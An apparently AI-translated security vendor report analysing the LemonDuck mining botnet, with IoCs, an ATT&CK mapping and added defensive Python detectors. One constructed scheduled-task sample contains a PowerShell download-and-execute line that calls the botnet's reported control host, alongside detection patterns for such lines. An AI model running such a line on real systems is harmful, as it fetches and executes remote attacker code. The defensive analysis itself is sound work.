Typical Mining Family Series Analysis 4: LemonDuck Mining Botnet

The original report is in Chinese, and this version is an AI-translated edition.

1.Introduction

With the rise of blockchain technology and cryptocurrencies in recent years, the open-source release of mining programs has lowered the barrier to building mining Trojans. Besides the many cybercrime groups that already operated mining Trojans, groups that had not previously done so have moved into this business, so mining Trojan activity has remained high. On September 3, 2021, the National Development and Reform Commission and other departments issued a notice on rectifying virtual currency "mining" activities [1], which explicitly required such activities to be rectified and cracked down on. In the year after the notice was issued, the rectification produced significant results, and the number of mining Trojans encountered by government, enterprise and school organizations kept falling. Cryptocurrency prices fell several times in 2022 and overall market capitalization trended downward, but spreading mining Trojans is still profitable for attackers, so many small mining Trojan families still appeared in 2022, for example Hezb, "1337" and Kthmimu.

Antiy CERT has compiled special reports on the typical mining Trojan families it has tracked and archived in recent years, has released them over recent months, and continues to track newly popular families. Each special report details the family's historical evolution, analyzes the iterated versions of its samples, sorts out historical attack events, provides post-infection troubleshooting methods and publishes additional IoCs. In addition, we continue to improve our own security products and adopt effective technical solutions to detect and remove mining Trojans, helping government, enterprise and school organizations protect themselves and clean up infections.

2.Introduction to Mining Trojans

2.1 What Is Mining

"Mining" refers to obtaining cryptocurrency by executing proof-of-work or similar algorithms; the currency is the "mine" and the people who mine it are usually called "miners". A "mining Trojan" is malicious code that implants a mining program on a victim's computer by various means and uses the victim's computing power to mine without the user's knowledge, thereby obtaining illegal profit. Any mining program that is illegally installed on a user's computer in this way is called a mining Trojan.

There are two ways to mine. One is solo mining, in which the miner connects directly to the cryptocurrency's peer-to-peer network and keeps all block rewards for itself; the other is pool mining, in which the miner connects to a mining pool and the income is shared according to the pool's rules. Because connecting to a pool is technically simple and the income is relatively stable, mining Trojans almost always use a pool. Mining can also be divided into passive mining, in which the mining program is implanted without the user's knowledge and the cryptocurrency obtained goes to the intruder, and active mining, in which people deliberately run mining programs on their own computing assets and the cryptocurrency obtained belongs to the owner or user of those assets. The essence of mining is to find, by brute-force trial, a hash value that satisfies the network's difficulty condition; its main effect on the victim is the consumption of host resources and electricity.
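To make the brute-force nature of the work concrete, the following added example (written for this edition, not code from the report or from any miner) implements a toy proof of work: a nonce is tried in sequence until the double SHA-256 of header plus nonce falls below a target, and the target halves with every extra difficulty bit. The header bytes are a constructed placeholder.

```python
import hashlib
import struct


def sha256d(data: bytes) -> bytes:
    """Double SHA-256, the hash used by Bitcoin-style proof of work."""
    return hashlib.sha256(hashlib.sha256(data).digest()).digest()


def target_for(difficulty_bits: int) -> int:
    """A hash 'meets the condition' when, read as a big-endian integer, it is below
    this target. Each additional bit halves the acceptance rate and doubles the work."""
    return 1 << (256 - difficulty_bits)


def mine(header: bytes, difficulty_bits: int, max_nonce: int = 1 << 32):
    """Brute-force a 32-bit nonce so that sha256d(header || nonce) < target.
    Returns (nonce, digest_hex, attempts), or None if the nonce space is exhausted.
    There is no shortcut: every attempt is one hash evaluation, which is why the
    cost shows up as CPU time and electricity on whichever host runs the loop."""
    target = target_for(difficulty_bits)
    for nonce in range(max_nonce):
        digest = sha256d(header + struct.pack("<I", nonce))
        if int.from_bytes(digest, "big") < target:
            return nonce, digest.hex(), nonce + 1
    return None


def verify(header: bytes, nonce: int, difficulty_bits: int) -> bool:
    """Checking a claimed solution costs one hash; finding it costs about
    2**difficulty_bits hashes. That asymmetry is what a pool relies on when
    it accepts 'shares' (solutions at a lower difficulty) as proof of work done."""
    digest = sha256d(header + struct.pack("<I", nonce))
    return int.from_bytes(digest, "big") < target_for(difficulty_bits)


def expected_attempts(difficulty_bits: int) -> int:
    return 2 ** difficulty_bits


if __name__ == "__main__":
    # Constructed placeholder for a block header (prev hash, merkle root, time, ...).
    header = b"constructed block header: prev-hash|merkle-root|time"
    for bits in (8, 12, 16):
        nonce, digest, attempts = mine(header, bits)
        print(f"{bits:2d} bits: nonce={nonce:6d} attempts={attempts:6d} "
              f"(expected ~{expected_attempts(bits)}) hash={digest[:16]}...")
```

Running it shows why pool mining gives a Trojan operator steady income: a real network difficulty would take an infected PC years to solve a block alone, but a pool hands out a much lower share difficulty, so each bot reports valid shares every few minutes and is paid pro rata.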

2.2 Why Is Mining Becoming More and More Rampant?

Compared with the equally popular ransomware business, mining provides more stable income. In a ransomware incident it is hard to locate the hosts whose encrypted content is actually valuable, and the victim has no guarantee of receiving a decryption service after paying, so the ransom obtained is far out of proportion to the scale of the activity.

In mining, as long as the mining Trojan runs on a computer it earns shares from the mining pool (the details depend on the pool's payout model) that are converted into income. Mining is also technically easier than ransomware: most operators use open-source mining programs and only need to register a wallet address, and once infections are running no further effort is needed to collect the proceeds.

The appreciation potential and anonymity of cryptocurrencies are further reasons mining Trojans keep spreading. Cryptocurrency lets attackers evade real-world financial tracing while holding an asset that may gain value, which is also why mining Trojans prefer privacy coins such as Monero.

2.3 The Harm of Mining Trojans

Victims usually assume that a mining Trojan merely slows the system down. In fact, besides degrading responsiveness, it reduces the performance and service life of the hardware, disrupts the organization's operations and wastes electricity. Moreover, mining Trojans now generally leave a backdoor, turning the victim host into a node under the attacker's control; the infected hosts form a botnet that is then commanded to attack other computers. Mining Trojans at this stage therefore no longer simply mine, but increasingly use their intrusion capability to gain further illegal profit.

3.Overview

The LemonDuck mining botnet was first active on December 14, 2018. Its operators spread it through a software supply chain: they compromised the update server of the Driver Life software and replaced the download link of the update program, so the botnet program was implanted when users updated Driver Life related software. At the same time it spread through the EternalBlue vulnerability to achieve wide distribution. According to researchers, it infected 100,000 hosts within two hours of the campaign starting [2]. Supply chain distribution of a mining Trojan or botnet was new at the time and drew the attention of most security vendors. In the more than three years since, the botnet has kept adding propagation methods, mainly multiple vulnerability exploits, service password brute forcing and phishing email delivery, to extend its reach. Through continuous updates its components have become a modular toolkit, and each module update also reports basic information about the target host back to the operators.

These attack techniques and activity characteristics show that the operators have technical capabilities comparable to an APT group, yet they engage in profit-driven cybercrime that draws the attention of the security community. Unlike typical cybercrime groups, their techniques are diversified and their profit-making capability is especially prominent.

4.LemonDuck Mining Botnet

The LemonDuck mining botnet is also known as the "Eternal Blue Downloader Trojan" and DTLMiner. The names reflect its propagation and attack activity: early distribution through the Driver Life update server, spreading inside target networks with the EternalBlue vulnerability, and the "LemonDuck" string found in its C2 communications and PowerShell scripts. Because of the specific names given to its scheduled tasks in earlier update campaigns, researchers also labelled those campaigns "Blue Tea Operation" [3] and "Black Ball Operation" [4].

The LemonDuck mining botnet is malware that integrates multiple malicious functions and is active in target networks mainly through botnet and mining activity. Its modules are iterated frequently and efficiently, and their functions keep growing. Successive updates added vulnerability exploitation components, removable storage infection, phishing emails and other propagation methods, greatly improving propagation efficiency, and also expanded the core business with new information theft and malware delivery functions.

Table 4 ‑1 LemonDuck mining botnet basic information

Family name: Eternal Blue Downloader Trojan, Eternal Blue Trojan Downloader, LemonDuck, DTLMiner (several names are in use)
First disclosure: December 15, 2018
First event: December 14, 2018
Reason for naming: Driver Life software supply chain propagation; EternalBlue vulnerability propagation; PowerShell scripts and the User-Agent of C2 connections contain the string "Lemon_Duck"
Threat types: Mining, botnet
Target: No specific target
Mode of transmission: Supply chain propagation, EternalBlue vulnerability exploitation, SMB brute forcing, $IPC brute forcing, phishing emails, SSH brute forcing, Redis brute forcing, RDP brute forcing, Hadoop Yarn unauthorized access vulnerability

Since the LemonDuck mining botnet was first disclosed, its activity has only intensified, with new attack, propagation and defense evasion methods: SMB weak-password spreading [5], MSSQL brute forcing [6], conversion of the mining module to a fileless form [7], exploitation of the "Stuxnet III" vulnerability (CVE-2017-8464) [8], SSH brute forcing [9], a ClipBanker stealer [10], and attacks on Docker hosts [11].

Table 4 ‑2 LemonDuck attack timeline​

Time | Event
December 2018 | Hijacked multiple software upgrade channels, including Driver Life, to distribute the mining Trojan; spread with the EternalBlue vulnerability
January 2019 | Wrote the backdoor and mining programs into scheduled tasks, added a Mimikatz password collection module, and brute-forced SMB weak passwords on the intranet
February 2019 | Added MSSQL brute forcing and modification of the database administrator password
March 2019 | Updated the lateral propagation modules ipc and ii.exe. The fileless attack module is now downloaded by the PowerShell backdoor instead of being dropped by the parent PE. Added weak-password brute forcing combined with wmic, and Pass-the-Hash via SMBClient/SMBExec
April 2019 | Added the fileless mining module
July 2019 | Added the "Stuxnet 3" vulnerability (CVE-2017-8464) exploit, spreading through removable drives and network shares
October 2019 | Added BlueKeep (CVE-2019-0708) detection and reporting
April 2020 | Added phishing email attacks
May 2020 | Added SMBGhost (CVE-2020-0796) detection and reporting, and added SSH brute-forcing code
June 2020 | Added the SMBGhost (CVE-2020-0796) exploit on Windows and SSH brute forcing on Linux; cross-platform mining Trojans began to spread
August 2020 | Added an attack method for the Hadoop Yarn unauthorized access vulnerability
December 2020 | Added the WebLogic unauthorized command execution vulnerability (CVE-2020-14882) as a propagation method
February 2021 | The Linux component reuses most modules of the Outlaw mining botnet and adds a scanning and propagation module
September 2021 | Added IPC brute forcing, an Elasticsearch vulnerability, an Apache Solr remote command execution vulnerability, and Docker Remote API unauthorized access
November 2021 | Added a Zegost-like backdoor, a ClipBanker stealer, and mining via a standalone executable
April 2022 | Added mining operations targeting Docker

LemonDuck attack timeline, as shown in Figure 4-1:

Figure 4‑1LemonDuck attack activity timeline

5.ATT&CK Mapping Diagram Corresponding to the LemonDuck Mining Botnet

Antiy CERT mapped the technical characteristics of this botnet's past attack activity to the ATT&CK framework:

Figure 5‑1 Mapping of technical characteristics to ATT&CK

The corresponding ATT&CK technique descriptions:

Table 5 ‑1 ATT&CK technique behavior description table corresponding to the incident

Tactic | Technique | Observed behavior
Initial Access | Exploit Public-Facing Application (T1190) | Spreads by exploiting vulnerabilities in exposed services
Initial Access | Phishing (T1566) | Spreads through phishing emails
Initial Access | Supply Chain Compromise (T1195) | Compromised the Driver Life update server to deliver the mining Trojan
Execution | Command and Scripting Interpreter (T1059) | Runs PowerShell and batch commands
Execution | Scheduled Task/Job (T1053) | Creates scheduled tasks
Persistence | Scheduled Task/Job (T1053) | Scheduled tasks run at fixed intervals
Defense Evasion | Indicator Removal (T1070) | Clears related logs on the host
Defense Evasion | Obfuscated Files or Information (T1027) | Encodes its malicious scripts
Credential Access | Unsecured Credentials (T1552) | Harvests SSH private keys and login credentials
Discovery | System Information Discovery (T1082) | Collects the target's OS version
Discovery | System Owner/User Discovery (T1033) | Collects the target's user names
Discovery | System Time Discovery (T1124) | Collects the target's system time
Lateral Movement | Exploitation of Remote Services (T1210) | Exploits vulnerabilities on other hosts to spread
Lateral Movement | Internal Spearphishing (T1534) | Sends phishing emails to the victim's address book
Lateral Movement | Remote Services (T1021) | Uses SSH to move laterally
Collection | Data from Local System (T1005) | Collects sensitive information from the target system
Exfiltration | Exfiltration Over Web Service (T1567) | Returns data in the parameters of HTTP GET requests
Impact | Resource Hijacking (T1496) | Hijacks computing resources for mining

6.Protective Recommendations

In response to mining attacks, Antiy recommends that enterprises take the following protective measures:

  1. Deploy the Windows/Linux version of the Antiy Intelligent Endpoint Protection System;
  2. Strengthen SSH passwords: avoid weak passwords; use passwords of 16 characters or more that mix upper- and lowercase letters, digits and symbols, and do not reuse the same password across servers;
  3. Apply system patches promptly: enable automatic updates on workstations, and keep servers patched;
  4. Apply third-party application patches promptly, especially for business applications such as Hadoop Yarn, WebLogic and Docker;
  5. Enable logging: collect key logs (security, system, error, access, transfer and cookie logs) to support tracing of security incidents;
  6. Harden hosts: conduct penetration testing and security hardening of the systems;
  7. Deploy an intrusion detection system (IDS): deploy traffic monitoring software or appliances to discover and trace malicious code. The Antiy Persistent Threat Detection System (PTD) analyzes network traffic, accurately detects a large volume of known malicious code and network attacks, and effectively discovers suspicious network behavior, assets and unknown threats.

Antiy Service: if you are attacked by malware, isolate the affected host promptly and preserve the scene while waiting for security engineers to examine the computer. Antiy 7*24 hours service hotline: 400-840-9234.

The Antiy Intelligent Endpoint Protection System (IEP) has been verified to effectively detect and remove this mining botnet.

Figure 6‑1 Antiy IEP can effectively detect and kill the mining botnet

7.Sample Analysis

This sample analysis is not limited to a single sample. It mainly examines the notable functions the LemonDuck mining botnet acquired during its updates, so that readers get a comprehensive picture of the family.

7.1 EternalBlue Vulnerability Propagation

The EternalBlue exploit component was packaged with py2exe or PyInstaller in successive sample updates.

Figure 7 ‑1 EternalBlue vulnerability exploit components

7.2 Phishing Email Propagation

Using COVID-19 themed lures, phishing emails carrying a malicious document named "urgent.doc" were distributed.

Figure 7 ‑2 Phishing email (Image source: Rising)

The malicious document is actually an RTF file that exploits CVE-2017-8570; opening it triggers the vulnerability and runs the PowerShell code embedded in the document.

Figure 7 ‑3 Vulnerability documents

Later samples added automated phishing email distribution, for example traversing the target host's email address book.

Figure 7 ‑4 Traverse the mailbox communication directory

The preset email subject and body.

Figure 7 ‑5 Preset email title and body

The preset attachments to be sent.

Figure 7 ‑6 Preset attachments to be sent

7.3 Backdoor Trojans “Fatten” Themselves

The fattening process has two stages. In the first, the Trojan creates a batch script that uses the type command to copy the file itself.

Figure 7 ‑7 Create a batch script

In the second stage, new backdoor file data is generated from the original file plus a randomly sized block of randomly generated padding, and written back over the original file. The final file is generally larger than 40 MB. Because both the file size and the hash change at random on every host, the file evades basic defenses that match on hash or size, and the oversized file may also exceed the upload limits of sandboxes and scanners.

Figure 7 ‑8 Randomly generate data and fill
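The padding lands after the last PE section, where the Windows loader never maps it, so the overlay size is a cheap triage signal. The following added example (written for this edition, not the botnet's code or Antiy's) builds a constructed, non-executable PE skeleton, appends random bytes the way the fattening stage does, and then measures the overlay from the section table. The 32 MB and 90% thresholds in looks_padded are assumptions to tune against your own clean software corpus.

```python
import hashlib
import os
import struct


def build_minimal_pe(section_data: bytes) -> bytes:
    """Constructed PE32 skeleton with one section. NOT executable; it only carries
    valid DOS/COFF/optional/section headers so the overlay check has real structure."""
    e_lfanew = 0x80
    dos_header = (b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\x00")
    opt_size = 0xE0                                              # PE32 optional header length
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)   # i386, 1 section, EXE
    optional = struct.pack("<H", 0x10B).ljust(opt_size, b"\x00")         # PE32 magic, rest zeroed
    headers_end = e_lfanew + 4 + 20 + opt_size + 40              # + "PE\0\0", COFF, optional, 1 section hdr
    raw_ptr = (headers_end + 0x1FF) & ~0x1FF                     # file alignment 0x200
    section = b".text".ljust(8, b"\x00") + struct.pack(
        "<IIIIIIHHI", len(section_data), 0x1000, len(section_data), raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = dos_header + b"PE\x00\x00" + coff + optional + section
    return image.ljust(raw_ptr, b"\x00") + section_data


def pe_overlay(data: bytes):
    """Return (end_of_last_section, overlay_bytes). Everything past the highest
    PointerToRawData + SizeOfRawData is overlay: never mapped, so bytes appended
    there change the size and hash without changing what executes."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("no PE signature")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    first_section = coff + 20 + opt_size
    end = 0
    for i in range(num_sections):
        size_raw, ptr_raw = struct.unpack_from("<II", data, first_section + 40 * i + 16)
        end = max(end, ptr_raw + size_raw)
    return end, max(0, len(data) - end)


def fatten(data: bytes, extra: int) -> bytes:
    """What the fattening stage does in effect: append random bytes after the last section."""
    return data + os.urandom(extra)


def looks_padded(data: bytes, min_overlay: int = 32 << 20, min_ratio: float = 0.9) -> bool:
    """Triage rule (thresholds are assumptions): flag a PE whose overlay is huge in
    absolute terms or makes up almost the whole file. Installers and signed binaries
    legitimately carry overlays, so treat a hit as a lead, not a verdict."""
    _, overlay = pe_overlay(data)
    return overlay >= min_overlay or (len(data) > 0 and overlay / len(data) >= min_ratio)


def md5hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


if __name__ == "__main__":
    original = build_minimal_pe(b"\xC3" * 64)          # 64 RET bytes as constructed section content
    fat = fatten(original, 40 << 20)                     # the report observes files above 40 MB
    for name, blob in (("original", original), ("fattened", fat)):
        end, overlay = pe_overlay(blob)
        print(f"{name}: size={len(blob)} last_section_end={end} overlay={overlay} "
              f"md5={md5hex(blob)} padded={looks_padded(blob)}")
```

Because the section table is untouched, a hash of the headers plus mapped sections only (an import hash or a section-range hash) stays stable across these variants even though the full-file MD5 in the IoC list changes; that is the check to add when full-file hashes stop matching.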

7.4  Fileless Mining

Uses the open-source Invoke-ReflectivePEInjection to inject the mining program into the memory of the PowerShell process and execute it there, so no mining binary touches disk.

Figure 7 ‑9 Fileless mining

7.5 CVE-2017-8464 Exploit

The added CVE-2017-8464 ("Stuxnet III") exploit, combined with a drive type detection routine, plants malicious shortcut files on network shares and removable storage; when a target opens them the exploit code runs, extending the botnet's reach.

Figure 7 ‑10 CVE-2017-8464 vulnerability exploit

7.6  Attacks on Linux

7.6.1 End Other Mining Processes

Terminates the processes of competing mining Trojans, matching on process name, file name and network connections.

Figure 7 ‑11 Ending other mining trojan processes

7.6.2  Download and Execute the Mining Trojan

Downloads and executes the mining Trojan by several alternative methods.

Figure 7 ‑12 Download and execute the mining trojan

7.6.3 Use the Target Host’s SSH Credentials to Attempt to Spread Laterally

Using the private keys found on the victim host and the IP addresses of past SSH connections, it iterates through the key and host combinations, attempts a passwordless SSH login to each remote host, and on success executes commands there to download and run its script.

Figure 7 ‑13 Lateral Transmission
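The same data the script harvests can be used defensively to see what an infected account could reach. The following added example (written for this edition, not the botnet's script) parses the hosts in a known_hosts file and in shell history, and checks whether each private key is usable without a passphrase by reading the cipher and KDF names in the openssh-key-v1 preamble (or the Proc-Type header of legacy PEM keys). All inputs are constructed samples embedded inline, and make_openssh_key_text produces a key envelope with dummy key material only.

```python
import base64
import re
import struct

# Constructed sample inputs; they are not captured from a real host.
SAMPLE_KNOWN_HOSTS = """\
10.0.0.5 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyMaterial
[db01.corp.example]:2222,192.168.1.40 ecdsa-sha2-nistp256 AAAAE2VjZHNhConstructed
|1|hashedSaltConstructed=|hashedHostConstructed= ssh-rsa AAAAB3NzaC1yc2EConstructed
"""
SAMPLE_BASH_HISTORY = """\
ls -la
ssh -i ~/.ssh/id_rsa deploy@app02.corp.example
scp backup.tgz ops@10.0.0.9:/tmp/
ssh -p 2200 root@172.16.3.3 'uptime'
"""


def hosts_from_known_hosts(text):
    """Plaintext known_hosts entries hand a worm its target list. Hashed entries
    (|1|salt|hash, written when HashKnownHosts is yes) cannot be read back and are
    reported as <hashed>, which is the reason to turn that option on."""
    targets = []
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        host_field = fields[1] if fields[0].startswith("@") else fields[0]  # skip @cert-authority/@revoked
        if host_field.startswith("|1|"):
            targets.append(("<hashed>", 22))
            continue
        for entry in host_field.split(","):
            port = 22
            if entry.startswith("["):                      # [host]:port form
                entry, _, port_str = entry[1:].partition("]:")
                port = int(port_str or 22)
            targets.append((entry, port))
    return targets


SSH_CMD = re.compile(r"\b(?:ssh|scp)\b.*?(\w[\w.-]*)@([\w.-]+)")


def hosts_from_history(text):
    """(user, host) pairs from ssh/scp commands in shell history; only user@host forms are parsed."""
    return [m.group(1, 2) for m in map(SSH_CMD.search, text.splitlines()) if m]


def _ssh_string(blob, pos):
    (length,) = struct.unpack_from(">I", blob, pos)
    return blob[pos + 4:pos + 4 + length], pos + 4 + length


def key_is_passphrase_free(pem_text):
    """True when the key works with no passphrase, i.e. anything running as this user
    can reuse it immediately. Handles the OpenSSH format and legacy PEM."""
    if "BEGIN OPENSSH PRIVATE KEY" in pem_text:
        b64 = "".join(l for l in pem_text.splitlines() if not l.startswith("-----"))
        blob = base64.b64decode(b64)
        magic = b"openssh-key-v1\x00"
        if not blob.startswith(magic):
            raise ValueError("not an openssh-key-v1 blob")
        cipher, pos = _ssh_string(blob, len(magic))      # ciphername, then kdfname
        kdf, _ = _ssh_string(blob, pos)
        return cipher == b"none" and kdf == b"none"
    return "Proc-Type: 4,ENCRYPTED" not in pem_text        # legacy PEM announces encryption in a header


def make_openssh_key_text(cipher, kdf):
    """Constructed key envelope: genuine openssh-key-v1 preamble, dummy key material."""
    s = lambda b: struct.pack(">I", len(b)) + b
    blob = (b"openssh-key-v1\x00" + s(cipher.encode()) + s(kdf.encode()) + s(b"")
            + struct.pack(">I", 1) + s(b"dummy-public") + s(b"dummy-private"))
    body = base64.b64encode(blob).decode()
    return ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
            + "\n".join(body[i:i + 70] for i in range(0, len(body), 70))
            + "\n-----END OPENSSH PRIVATE KEY-----\n")


def audit(known_hosts_text, history_text, keys):
    """keys maps a path to that key file's text. Returns what a LemonDuck-style
    script could reach from this account without supplying any password."""
    targets = hosts_from_known_hosts(known_hosts_text)
    targets += [(host, 22) for _, host in hosts_from_history(history_text)]
    return {"targets": targets,
            "passphrase_free_keys": [p for p, t in keys.items() if key_is_passphrase_free(t)]}


if __name__ == "__main__":
    keys = {"~/.ssh/id_ed25519": make_openssh_key_text("none", "none"),
            "~/.ssh/id_rsa": make_openssh_key_text("aes256-ctr", "bcrypt")}
    report = audit(SAMPLE_KNOWN_HOSTS, SAMPLE_BASH_HISTORY, keys)
    print("reachable targets:", report["targets"])
    print("keys usable without a passphrase:", report["passphrase_free_keys"])
```

On a real host, run audit over ~/.ssh/known_hosts, the shell history and every file under ~/.ssh for each account; a passphrase-free key plus a plaintext known_hosts is exactly the combination the lateral movement routine needs, and every such pair is a host that must be checked after an infection.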

7.6.4 Clear Logs

The Linux script ends with a routine that clears related log data.

Figure 7 ‑14 Log clearing

8.LemonDuck Module Iteration

8.1 Parent File Iteration

The parent file's main job is to drop and run the cloud control module and to download and run the propagation module. As the infection base grew and LemonDuck's components multiplied and gained functions, the parent file's role shifted: later component updates and propagation are essentially all carried out by the PowerShell backdoor.

Table 8 ‑1 Parent file iteration

Parent file format | Remark
PE file (v1: F79CB9D2893B254CC75DFB7F3E454A69) | Delivered through the Driver Life upgrade channel. Drops the cloud control Trojan and downloads and executes the attack/propagation module; also collects system information and dynamically fetches cloud control code. Supply chain links: hxxp://pull.update.ackng.com/ziptool/pullexecute/f79cb9d2893b254cc75dfb7f3e454a69.exe, hxxp://dl.haqo.net/dl.exe
PE file (v2: FB89D40E24F5FF55228C38B2B07B2E77) | hxxp://172.104.73.9/dll.exe, hxxp://dl.haqo.net/updatedl.exe, hxxp://120.52.51.13/dl.haqo.net/dl.exe
PE file (v3: 59B18D6146A2AA066F661599C496090D) | EternalBlue download links: hxxp://dl.haqo.net/dll.exe?fr=xx, hxxp://dl.haqo.net/updater.exe?ID=xxxxx (parameterized links; the target host's information is uploaded in the request)

8.2Cloud Control Module Iteration

The cloud control module was active in the early period; later the botnet mainly updated and downloaded components through the backdoor module.

Table 8‑2 Cloud control module iteration

File format | Source
PE file | Stored in the resource section of the parent PE. It is actually a shellcode loader that dynamically obtains shellcode from the parent process's shared memory to implement the remote control function.
PE file | Independent process, started by a service named Ddriver and a scheduled task named Ddriver.

8.3 Propagation Module Iteration

The propagation module iterated in both carrier format and function. The carriers are mainly PE files and PowerShell scripts; the functional additions include the EternalBlue vulnerability, CVE-2017-8464 (the LNK vulnerability), BlueKeep, the Hadoop Yarn unauthorized access vulnerability, and RDP/SMB/MSSQL/$IPC brute forcing.

Table 8 ‑3 Propagation module iteration

Time | File type | Remark
December 14, 2018 | PE file | EternalBlue exploit module written in Python and packaged with py2exe; carries the command to implant (download and execute) after successful exploitation
January 25, 2019 | PE file | Added Mimikatz to collect logon passwords; added SMB weak-password brute forcing
February 10, 2019 | PE file | Files now packaged with PyInstaller
February 23, 2019 | PE file | Added MSSQL brute forcing
March 8, 2019 | PE file | Downloaded by the PowerShell backdoor
 | PowerShell script | Fileless; PowerShell scripts for EternalBlue exploitation and SMB brute forcing
March 28, 2019 | PowerShell script | Fileless; added Invoke-SMBExec, using an NTLM hash dictionary for Pass-the-Hash attacks
July 19, 2019 | PowerShell script | Added the CVE-2017-8464 LNK exploit, infecting removable storage and network shares; added MSSQL brute forcing
 | PowerShell script | Added RDP brute forcing and $IPC brute forcing
April 3, 2020 | PowerShell script | Spread by phishing emails; the attachment "urgent.doc" exploits CVE-2017-8570
June 10, 2020 | PowerShell script | Added the CVE-2020-0796 exploit; added SSH and Redis brute forcing against Linux servers
June 24, 2020 | PE file | New Python-packaged executables able to spread via EternalBlue, MSSQL brute forcing, $IPC and SMB brute forcing, etc.
August 18, 2020 | PowerShell script | Added attacks on Linux servers through the Hadoop Yarn unauthorized access vulnerability

8.4 Backdoor Module Iteration

The backdoor module periodically fetches PowerShell code, giving the botnet long-term residence on the target and a channel to update its other components.

Table 8 ‑4 Backdoor module iteration

File type | Remark
Fileless | PowerShell code run from a scheduled task named MicrosoftwindowsBluetooths; fetches code from hxxp://r.minicen.ga/r?p every 50 minutes
Fileless | PowerShell code run from a scheduled task named Bluetooths; fetches code from http://v.beahh.com/v followed by the target host's domain name, every 50 minutes
Fileless | Scheduled task \Microsoft\Windows\Rass; fetches code from http://v.beahh.com/wm?smb
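A scheduled task that runs PowerShell with a download cradle on a short repetition interval is the durable artifact of this backdoor, and it survives even when the task names change. The following added example (written for this edition, not Antiy's tooling) triages Task Scheduler XML definitions from C:\Windows\System32\Tasks: it flags known LemonDuck task names, a scripting host whose arguments contain a download-and-execute cradle, and a sub-hourly Repetition/Interval. The two task definitions are constructed samples; the cradle in the suspicious one is written to resemble the behaviour described above, not copied from a sample.

```python
import os
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

# Constructed task definitions in the layout of C:\Windows\System32\Tasks\<name>.
# Real task files start with a UTF-16 BOM; ET.fromstring() on the raw bytes handles that.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Bluetooths</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT50M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2020-06-10T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://v.beahh.com/v?'+$env:USERDOMAIN)"</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2020-01-01T02:00:00</StartBoundary>
    <ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>%ProgramFiles%\Windows Defender\MpCmdRun.exe</Command><Arguments>Scan -ScheduleJob</Arguments>
  </Exec></Actions>
</Task>"""

# Task names reported for this family in the table above, compared on the leaf name, case-insensitively.
KNOWN_TASK_NAMES = {"bluetooths", "microsoftwindowsbluetooths", "rass"}
SHELL_RE = re.compile(r"(?i)(powershell|pwsh|cmd\.exe|mshta|wscript|cscript|regsvr32|rundll32)")
CRADLE_RE = re.compile(r"(?i)(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|\biex\b"
                       r"|invoke-expression|-enc(odedcommand)?\b|frombase64string)")


def iso_duration_minutes(value):
    """Task Scheduler repetition intervals are ISO 8601 durations such as PT50M or P1DT2H."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", (value or "").strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + minutes + seconds / 60


def triage_task(xml_data):
    """Return {'task', 'suspicious', 'reasons'} for one task definition (str or bytes)."""
    root = ET.fromstring(xml_data)
    uri = (root.findtext(f"{NS}RegistrationInfo/{NS}URI") or "").strip()
    reasons = []
    if uri.rsplit("\\", 1)[-1].lower() in KNOWN_TASK_NAMES:
        reasons.append(f"task name {uri!r} matches a LemonDuck indicator")
    for exec_node in root.iter(f"{NS}Exec"):
        command = (exec_node.findtext(f"{NS}Command") or "").strip()
        args = (exec_node.findtext(f"{NS}Arguments") or "").strip()
        if SHELL_RE.search(command) and CRADLE_RE.search(args):
            reasons.append(f"{command} runs a download cradle: {args[:60]}")
    intervals = [iso_duration_minutes(e.text) for e in root.iter(f"{NS}Interval")]
    intervals = [i for i in intervals if i is not None]
    if reasons and intervals and min(intervals) <= 60:
        reasons.append(f"repeats every {min(intervals):g} min (beaconing)")
    return {"task": uri, "suspicious": bool(reasons), "reasons": reasons}


def triage_task_dir(path=r"C:\Windows\System32\Tasks"):
    """Walk the task store and return only the suspicious entries."""
    hits = []
    for dirpath, _, files in os.walk(path):
        for name in files:
            with open(os.path.join(dirpath, name), "rb") as f:
                try:
                    result = triage_task(f.read())
                except ET.ParseError:
                    continue
            if result["suspicious"]:
                hits.append(result)
    return hits


if __name__ == "__main__":
    for sample in (SUSPICIOUS_TASK, BENIGN_TASK):
        print(triage_task(sample))
```

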